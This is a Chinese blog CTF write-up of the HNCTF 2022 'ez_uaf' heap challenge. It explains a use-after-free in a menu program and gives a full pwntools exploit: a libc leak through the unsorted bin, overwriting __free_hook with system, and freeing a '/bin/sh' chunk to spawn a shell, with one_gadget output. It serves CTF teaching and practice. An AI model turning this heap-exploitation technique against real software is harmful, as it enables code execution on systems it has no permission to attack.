【PWN · heap | UAF】[HNCTF 2022 WEEK4]ez_uaf

最新推荐文章于 2024-06-16 20:38:45 发布
最新推荐文章于 2024-06-16 20:38:45 发布
阅读量699 收藏 18
点赞数 12
文章标签: pwn ctf uaf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/136412110
版权
文章描述了一种利用UAF(UseAfterFree)漏洞的内存安全问题,通过精心构造内存分配顺序,实现了对后续内存区域的控制,从而实现任意地址读写和系统调用。作者通过示例和解题步骤详细展示了如何构造payload和利用过程。
摘要由CSDN通过智能技术生成

简单的、可当作模板题练习的UAF。甚至我都没过多调试,通过画图就解决了大部分问题

前言

UAF释放后重用,常见于free指针后指针未置Nullptr。

这就导致了原本的功能块还可以使用,而新分配的功能块又附加了额外的功能。利用就在此产生。

一、题目简述

还是经典的菜单题

要知道堆分配后(往往是结构体)的布局是怎么样的,一般add就可以看的很清楚

看看show函数

看看edit函数

看看delete函数

总结如下:结构体中具有一个具备读写权限的指针,而且存在UAF漏洞。如果我们利用漏洞能够控制该指针,就获得了任意地址读写的权柄(权柄两个字听起来很牛,最近在追诡秘) 

二、解题步骤分析

我们这次倒着来分析:

  1. getshell有多种方法,如,gadget链、got表劫持、hook函数等
  2. 这里有一个读写权限的指针,假设能够任意指定这个指针的数值(指向的地址),那么got表劫持和hook函数都是不错的方案。以劫持_free_hook为例。
  3. 如何劫持这个指针?或许我们可以利用UAF。考虑到tcache先入后出、后入先出的“倒转”特性,以及结构体与堆动态分配内存的构成关系——是否可以通过精心构造出入free-malloc顺序,使得重新malloc的、作为content的chunk,因UAF在另一个结构体关系中,是具有ptr的结构体呢?

        当依次free后,(这里写错了,内容域为0x20,chunk大小0x30)tcache中:

                 当我们add时,如果content的size刚好能分配0x20内容域(chunk大小0x30),那么原本作为结构体的chunk就被分为了content,而这里是UAF,相当于之前的身份还能被使用。语文不好,解释不清,上图:

因此,如果说5号结构体的ptr域是一个笔,是目光,那么通过6就能够修改这支笔写的位置、修改目光看去的方向——通过6来edit 5,实现“任意位置”;通过5来edit内容,实现“读和写”。因此,我们实际构成了这样一个链表:6->5->content,实现任意位置读写。

三、EXP 

from pwn import *
from pwn import u64,p64
context(arch='amd64',log_level='debug')

# size,name,content
def add(size,name,content):
    io.recvuntil(b'Choice: \n')
    io.sendline(b'1')
    io.sendlineafter(b'Size:\n',str(size).encode())
    io.sendlineafter(b'Name: \n',name)
    io.sendlineafter(b'Content:\n',content)

def delete(id):
    io.recvuntil(b'Choice: \n')
    io.sendline(b'2')
    io.sendlineafter(b'idx:\n',str(id).encode())

def show(id):
    io.recvuntil(b'Choice: \n')
    io.sendline(b'3')
    io.sendlineafter(b'idx:\n',str(id).encode())


def edit(id,payload):
    io.recvuntil(b'Choice: \n')
    io.sendline(b'4')
    io.sendlineafter(b'idx:\n',str(id).encode())
    io.send(payload)

# io=process('./pwn')
io=remote('node5.anna.nssctf.cn',28654)
elf=ELF('./pwn')
libc=ELF('./libc-2.27.so')
if input()!='':
    gdb.attach(io);input()
# test
'''
add(10,b'aaaa',b'aaaa')
show(0)
edit(0,b'bbbb')
show(0)
delete(0)
'''

### 通过unsorted-bin-leak泄露libc
# 填充tcache
for i in range(9):
    add(0x90,b'/bin/sh\x00',b'abcd')   # 0~8
for i in range(8):
    delete(i)
# leak libc
show(7)
leak=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
success('leak: '+hex(leak))
main_arena=leak-96
success('main_arena: '+hex(main_arena))
libc_base=leak-0x3ebca0
success('libc: '+hex(libc_base))
input('[!]check!')

'''
0x30 [  7]: 0x55e852d8b740 —▸ 0x55e852d8b670 —▸ 0x55e852d8b5a0 —▸ 0x55e852d8b4d0 —▸ 0x55e852d8b400 —▸ 0x55e852d8b330 —▸ 0x55e852d8b260 ◂— 0x0
0xa0 [  7]: 0x55e852d8b770 —▸ 0x55e852d8b6a0 —▸ 0x55e852d8b5d0 —▸ 0x55e852d8b500 —▸ 0x55e852d8b430 —▸ 0x55e852d8b360 —▸ 0x55e852d8b290 ◂— 0x0
'''


### 通过UAF获得具有任意地址读写权限的指针
add(0x20,b'/bin/sh\x00',b'beef')       # 9
input('[!]check!')

'''
Allocated chunk | PREV_INUSE
Addr: 0x55e852d8b660
Size: 0x30 (with flag bits: 0x31)

Free chunk (tcachebins) | PREV_INUSE
Addr: 0x55e852d8b690
Size: 0xa0 (with flag bits: 0xa1)
fd: 0x55e852d8b5d0

Allocated chunk | PREV_INUSE
Addr: 0x55e852d8b730
Size: 0x30 (with flag bits: 0x31)

'''

free_hook=libc.sym['__free_hook']+libc_base
edit(9,0x10*b'\x00'+p64(free_hook))
input('[!]check!')

'''
0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f302 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a2fc execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
 ez_uaf
'''

one_gadget=libc_base+0x10a2fc
system=libc_base+libc.sym['system']
# edit(6,p64(one_gadget))
edit(5,p64(system))

delete(9)
# add(0x10,b'aaaa',b'aaaa')
# delete(1)
# add(0x20,b'aaaa',b'aaaa')
# add(0x20,b'aaaa',b'aaaa')

io.interactive()

总结

强烈建议手动画图!以至于第一次在大致写完遇到bug后,甚至仅通过画图审计代码来修改逻辑上的问题,成功实现利用!这说明利用思路是如此清晰。

Mr_Fmnwon
关注
  • 12
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
在网络安全领域,特别是针对Pwn(破解)类竞赛,"jmp_rsp"是一个常见的技术概念,主要涉及栈溢出漏洞的利用。广东大学生网络攻防大赛中的这个“jmp_rsp”题目显然是设计来测试参赛者对这类漏洞的理解和利用能力。...
ez_uaf复现
xiaolei0413的博客
04-18 848
之前在学习堆的时候中途懈怠了,导致进度止步不前一直未能理解堆题如何操作,俩个星期前重新开始学习堆的知识,在看完各种视频和博客后有了这一次的uaf题复现。
2022HNCTF-web
bossDDYY的博客
10-30 3240
应该和http协议有关 想要什么 肯定flag说我们不是admin 看看cookie修改cookie继续修改 x-forwarded-for [Week1]2048 分析 题目描述你能达到20000分吗?应该是要求我们玩到20000分F12查看脚本直接输入在控制台输入 [Week1]easy_html 分析 输入框限制了11位 f12修改html属性 或者直接post参数 [Week1]Interesting_include 分析 题目描述:web手要懂得搜索 应该要借助浏览器一眼伪协议base64解码 [
PWN · heap | UAF】[BJDCTF 2020]YDSneedGirlfriend
Mr_Fmnwon的博客
11-02 179
UAF-释放后重用,这一题和wiki上教学的那一题一样,是纯的裸UAF题目初步涉猎heap,对于典型的漏洞利用,多加记载。
PWN · UAF】[NISACTF 2022]UAF
Mr_Fmnwon的博客
07-22 672
作为本萌新做的第一道堆题,接触到新的领域,总是又能够学到很多东西。本题用到了堆漏洞UAF:use after free。UAF的第一题,Heap的第一题。heap一直都是pwn里的大头,好好学!加油!
PWN · heap | Off-By-Null | UAF | Fastbin-attack | Unsortedbin-leak | hook劫持】[攻防世界] babyheap
Mr_Fmnwon的博客
04-02 636
【攻防世界】的本题,所给libc版本错误,经过测试,版本为:libc6_2.23-0ubuntu9_amd64.so当然,本地调试玩玩,用glibc-all-in-one的2.23-0ubuntu3_amd64也是可以的。这题学到了很多知识点(主要是这些知识点整合应用在一起)离不开这些优秀的博客和大佬ha1vk攻防世界PWN之Babyheap(null off by one)题解PLpa、攻防世界(pwn)babyheap(一些常见的堆利用方法)攻防世界-babyheap解题思路-CSDN博客。
first_fit&UAF(heap)
个人笔记
06-21 241
first_fit&UAFfirst_fit原理实例分析原理UAF实例 first_fit原理 堆管理器对free的chunk未完全回收,当再次调用malloc时,会分配先前已经有内容的chunk。 大致流程如下图,但需要避免一些对管理器的检测机制(在一定限制条件下) 实例分析原理 下面看个demo调试,验证上面情况。 #include<stdio.h> #include<stdlib.h> #include<string.h> int main() {
LCTF2018 PWN easy_heap学习(以及tcache基础认识)
a2590035252的博客
09-24 425
适合于广大像我一样的pwn爱好者
pwn学习-UAF-hacknote
Sa1nZen的博客
06-16 365
pwn学习-UAF-hacknote
CISCN2021pwn lonelywolf(uaf,控制0x250tcache头)
m0_51251108的博客
10-02 197
复现CISCN2021pwn lonelywolf
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
基于Matlab的模糊PID控制系统设计及仿真.pdf
08-05
基于Matlab的模糊PID控制系统设计及仿真
黑马头条,黑马头条,黑马头条
08-05
黑马头条,黑马头条,黑马头条
基于ppo算法的计算卸载策略研究python
08-05
ppo算法 基于ppo算法的计算卸载策略研究 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
SQLTools插件下载与使用说明
最新发布
08-05
1
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
08-17
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA是用来表示不同内存区块的缩写标记。其中,STACK代表栈空间,HEAP代表堆空间,CODE代表代码段,DATA代表数据段,RWX代表可读、可写、可执行的空间,RODATA代表只读的数据段。这些标记通常用于描述程序的内存布局,以帮助理解程序的运行机制。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [realloc函数UAF利用|攻防世界pwn进阶区supermarket](https://blog.csdn.net/weixin_43092232/article/details/105014161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值